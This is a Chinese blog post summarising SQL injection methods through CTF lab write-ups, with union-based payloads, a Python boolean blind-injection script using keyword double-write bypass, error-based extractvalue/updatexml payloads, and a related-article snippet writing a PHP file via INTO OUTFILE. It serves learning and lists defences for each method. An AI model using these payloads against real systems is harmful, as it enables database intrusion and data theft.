sql注入小结

最新推荐文章于 2023-03-12 20:37:13 发布
最新推荐文章于 2023-03-12 20:37:13 发布
阅读量115 收藏
点赞数 1
分类专栏: 笔记 web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31028197/article/details/116759211
版权
web 同时被 3 个专栏收录
4 篇文章 0 订阅
订阅专栏
笔记
3 篇文章 0 订阅
订阅专栏
sql
2 篇文章 0 订阅
订阅专栏

常见注入方式

1, union查询

例题《从0到1:CTFer成长之路》题目 SQL注入-1
进入靶机,看到

/index.php?id=1

get 方式注入,测试id后的数,发现3有个提示,可以忽略
尝试单引号闭合

?id=1' or 1 --       //正常显回
?id=1' and 1 = 1 --  //正常显回
?id=1' and 1 = 2 --  //没有显回

判断可以注入,先测试显回

?id=1' order by 3 -- 
?id=-1' union select 1,2,3 --

在这里插入图片描述

//查询information_schema库获取库信息
?id=-1' union select 1,2,group_concat(schema_name) from INFORMATION_SCHEMA.schemata -- 

//获取到有一个note库,查询表
?id=-1' union select 1,2,group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema = 'note' -- 

//获取两个表,fl4g和notes表,查询列名
?id=-1' union select 1,2,group_concat(column_name) from INFORMATION_SCHEMA.columns where table_name = 'fl4g'-- 

//获取到列名fllllag,查询信息
?id=-1' union select 1,2,group_concat(fllllag) from fl4g--

得到flag
防御措施:禁用函数,过滤敏感词,预编译都有效果

2,布尔盲注

例题《从0到1:CTFer成长之路》题目 SQL注入-1
进入后让进入 login.php,后看到一个登录框,尝试

admin
123' or 1 --

尝试各种姿势都登录不上去,但发现了

admin' and 1=1 --   //显示账户或密码错误
返回 {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}

admin' and 1=2 --   //显示账户不存在
返回 {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}

判断存在布尔盲注,因为是盲注,所以需要用脚本
(之前刚学python的时候写的,比较凌乱)

import requests
import time
from urllib.parse import quote

char = ' 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,{}_-='

def request(key):
    burp0_url = "http://eci-2ze3l5mg59muqe0h5h6n.cloudeci1.ichunqiu.com:80/login.php"
    burp0_data = {"name": "admin"+key, "pass": "1234"}
    req = requests.post(burp0_url, data=burp0_data)
    if req.text.find(r'\u9519\u8bef')!=-1:
        return 1
    else:
        return 0

爆库名,得到note

def sd(l):#库名
    result=''
    for i in range(1,l+1):#mysql反计算机的从1开始非0
        for j in char:
            key = "'and substr(database(),{0},1)='{1}'#"
            key=key.format(i,j)
#            key = quote(key)
            if request(key):
                result+=j
                print(result)
                break            
    return result

在尝试爆表的时候发现有过滤存在,双写绕过

name=admin'and length('select') = 0 #
&pass=123

name=admin'and length('sselectelect') = 6 #
&pass=123

def st():
    for i in range(0,1000):
        l=0
        result=''        
        for j in range(0,100):#表长
            key = "'and length((selselectect table_name from information_schema.tables where table_schema=database() limit {0},1))={1}#"
            key=key.format(i,j)
#            key = quote(key)
            if request(key):
                l=j
                print(l)
                break
        if l==0:#表长为零表示没有表了,跳出i的循环
            break
        for j in range(1,l+1):#表名
            for k in char:
                key = "'and substr((seselectlect table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1)='{2}'#"
                key=key.format(i,j,k)
#                key = quote(key)
                if request(key):
                    result+=k
                    print(result)
                    break
        print(result)

得到两个表,fl4g 和 users
爆破fl4g的字段

def sc(t):
    for i in range(0,1000):
        l=0
        result=''        
        for j in range(0,100):#字段长
            key = "'and length((selselectect column_name from information_schema.columns where table_name='{0}' limit {1},1))={2}#"
            key = key.format(t,i,j)
#            key = quote(key)
            if request(key):
                l=j
                print(l)
                break
        if l==0:
            break
        for j in range(1,l+1):#字段名
            for k in char:
                key = "'and substr((seselectlect column_name from information_schema.columns where table_name='{0}' limit {1},1),{2},1)='{3}'#"
                key=key.format(t,i,j,k)
#                key = quote(key)
                if request(key):
                    result+=k
                    print(result)
                    break
        print(result)

得到一个字段 flag
爆破flag

def sa(c,t):
    for i in range(0,1000):
        l=0
        result=''        
        for j in range(0,100):#数据长
            key = "'and length((seselectlect {0} from {1}))={3}#"#需要查询的字段和表名
            key = key.format(c,t,i,j)
#            key = quote(key)
            if request(key):
                l=j
                print(l)
                break
        if l==0:
            break
        for j in range(1,l+1):#数据
            for k in char:
                key = "'and substr((seselectlect {0} from {1}),{3},1)='{4}'#"
                key=key.format(c,t,i,j,k)
#                key = quote(key)
                if request(key):
                    result+=k
                    print(result)
                    break
        print(result)

得到flag(挺长的,有时间改一下代码,现在结构很乱,而且很慢)
防御:循环过滤敏感词,过滤单引号,限制输入的长度,预编译

3,时间盲注

利用sql执行sleep指令,通过判断请求到返回的时间来判断结果,也是需要使用脚本自动化攻击,上面的代码可以改改用,不过很慢
判断依据:尝试执行SELECT(SLEEP(5))等
暂时没找题目。。。有时间补上

4,报错型注入

通过sql的特性,当输入错误的语句时会进行报错,报错会带出许多的信息
常用的函数:

extractvalue函数 extractvalue(xml_document,Xpath_string)
	Xpath_string必须是符合xpath语法的字符串,不符合就会报错
	利用这一点,可以使它执行查询,因为结果不符合语法被报错弹出
	使用concat在前面合并上一个特殊符号让语句绝对不符合语法
	pyload:id='and(select extractvalue("anything",concat('~',(select语句))))
	             id='and(select extractvalue(1,concat(0x7e,@@version)))

	updatexml函数 updatexml(xml_document,xpath_string,new_value)
	第二个参数同理
	payload:id='and(select updatexml("anything",concat('~',(select语句())),"anything"))

暂时没找题目。。。有时间补上
防御:关闭报错回显,过滤关键词,预编译

5,可多语句查询注入

十分危险的一种注入,基本上可以对数据库做任何操作,甚至可以通过上传bin文件拿到shell
判断方式:在语句后加入 ;sql语句 如果能够执行,便存在多语句注入
暂时没找题目。。。有时间补上

LDAx
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入
午夜安全
10-03 6606
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠注入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
SQL注入基础
m0_73477772的博客
04-29 2065
SQL注入基础
i春秋CTF-WEB题解(二)
weixin_42271850的博客
07-08 1181
简述         还是和之前一样,每做三题写一个题解记录一下。 一、SQL         题目给的提示是:题目内容提示这是一道SQL注入题目。打开网页查看源代码能看到有一些提示: <!--SELECT * FROM info WHERE id=1--><br />flag{在数据库中}<br />&
一道简单的sql注入题目
weixin_44215027的博客
11-05 1949
一道简单的sql注入题目 好久都没有做ctf的题目了,最近又重新开始回顾了。首先是sql注入。这是一道简单的整数型注入题目。 首先,进入网址:http://www.kabelindo.co.id/index.php 刚开始我以为是搜索框注入,然后我发现我错了。。。。 但是,我看到了news: 这就非常的舒服,进入后果然有一个注入点 加一个单引号,会报错。加 and 1=1,不会报错。说明是一...
SQL注入详解(万字文章详解)
追光者的博客
03-12 8163
本文章仅为学习交流使用,请勿做其它用途使用,请勿触碰法律红线。
SQL注入-二次注入和多语句注入
LJH1999ZN的博客
02-11 982
一、二次注入的定义 简单的说二次注入就是已经存储到数据库中的用户输入,在进行再一次读取的时候进去SQL查询语句中的注入。 二、二次注入的原理 第一步:插入恶意数据 第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留的原来的数据,但是数据本身包含恶意内容。 第二步:引用恶意在将数据 存入数据库后,开发者认为数据是可信的,在下一次需要进行的查询的时候,直接从数据库中提出了恶意数据,没有进行进一步的检验和处理,就会造成sql的二次注入数据 三、二次注入原理的演
SQL注入绕WAF小结
05-08
### SQL注入绕WAF小结 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL语句来获取敏感数据、修改数据或执行其他非法操作。随着网络安全技术的发展,Web应用防火墙...
PHP+mysql防止SQL注入的方法小结
12-20
SQL注入 例:脚本逻辑 $sql = "SELECT * FROM user WHERE userid = $_GET[userid] "; 案例1: 复制代码 代码如下:SELECT * FROM t WHERE a LIKE ‘%xxx%’ OR (IF(NOW=SYSDATE(), SLEEP(5), 1)) OR b LIKE ‘1=1 ...
PHP中全面阻止SQL注入式攻击分析小结
01-21
一、 引言 PHP是一种力量强大但相当容易学习的服务器端脚本语言,即使是经验不多的程序员也能够使用它来创建复杂的动态的web站点。然而,它在实现因特网服务的秘密和安全方面却...我们将解释如何保护你的脚本免于SQL注
详细讲解双查询注入
weixin_34138255的博客
03-22 353
上一篇文章中,http://leaver.me/archives/2726.html我说双查询很难讲清楚,这次就试着讲一下。读了一些原理性的东西。然后尽量通俗的给大家讲清楚。。在此之前,我们理解一下子查询,查询的关键字是select,这个大家都知道。子查询可以简单的理解在一个select语句里还有一个select。里面的这个select语句就是子查询。看一个简单的例子:Sel...
i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)
LSYZWF的博客
05-21 2048
文章目录题目链接:解题思路1、首先点击login.php,输入进行尝试2、开始尝试是否存在注入3、这里可以判断列字段的个数,但是没有回显此步可以省略4、由于没有回显,故只能尝试盲注5、抓包分析6、编写脚本 题目链接: https://www.ichunqiu.com/battalion?t=1&r=68487 解题思路 1、首先点击login.php,输入进行尝试 输入admin显示账户或者密码错误 而输入其他显示账号不存在 这里可以初步猜测用户名就是admin 2、开始尝试是否存在注入 输入a
从0到1CTFer成长之路-第一章-CTF中的SQL注入
黑白的博客
03-01 1952
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
多条件查询语句,避免sql拼接引起sql注入写法
wjy397的专栏
10-31 3374
para_count = (name,name,usertype,usertype) sql_count = """ select count(*) as counts from users where v_account_type !='tequia' AND (%s is NULL or v_username = %s) AND (%s i
6、Spring:依赖注入(DI)
Surplus.的博客
09-03 211
文章目录6.1 概念6.2 构造器注入6.2 Set 注入 (重点)6.2.1 常量注入6.2.2 Bean注入6.2.3 数组注入6.2.4 List注入6.2.5 Map注入6.2.6 set注入6.2.7 Null注入6.2.8 Properties注入6.3 p命名和c命名注入 6.1 概念 依赖注入(Dependency Injection,DI) 依赖 : 指Bean对象的创建依赖于容器 . Bean对象的依赖资源 . 注入 : 指Bean对象所依赖的资源 , 由容器来设置和装配
sql注入之——堆叠(多语句注入)
wsnbbz的博客
02-10 1676
条件 源代码使用musqli_multi_quiery();多语句查询函数,即可一次执行多条sql语句 语句 ?id=1’;select “<?php phpinfo(); ?>” into outfile “D:\PHPKFGJ\phpstudy\PHPTutorial\WWW\213.php”-- - 效果 该目录下写入了213.php文件,可由此写入一些木马文件 ...
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
最新发布
08-14
【独家首发】基于蜣螂优化算法DBO-GMDH的风电数据回归预测研究Matlab实现.rar
深度探索:神经网络在图像识别中的革命性应用
08-14
神经网络是一种受人脑结构启发的数学模型,它由大量的节点(或称为“神经元”)相互连接构成。这些节点通常组织成层,包括输入层、隐藏层和输出层。每个神经元可以接收来自前一层的输入,通过某种激活函数处理这些输入,然后将结果传递给下一层的神经元。 神经网络能够通过学习大量的数据来识别模式和特征,这使得它们在图像识别、语音识别、自然语言处理等领域有着广泛的应用。它们也可以用于预测、分类和回归等任务。 训练神经网络通常涉及到一个称为“反向传播”的过程,通过这个过程,网络可以调整其内部参数(权重和偏置),以便更好地完成特定的任务。这个过程通常需要大量的计算资源,并且伴随着梯度下降或其他优化算法来最小化损失函数,从而提高模型的性能。 随着深度学习技术的发展,神经网络变得更加复杂和强大,出现了各种类型的网络结构,比如卷积神经网络(CNNs)用于图像处理,循环神经网络(RNNs)用于序列数据,以及长短期记忆网络(LSTMs)等。
基础会计教学课件第十一章财务会计报告.pptx
08-14
基础会计教学课件第十一章财务会计报告.pptx
SQLServer 存储过程调优小结
05-17
下面是一些 SQL Server 存储过程调优的小结: 1.使用 SET NOCOUNT ON 语句:这个语句可以关闭每条 SQL 语句返回的行数,减少网络流量。 2.使用 WITH RECOMPILE 选项:这个选项可以在每次执行存储过程时重新编译...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值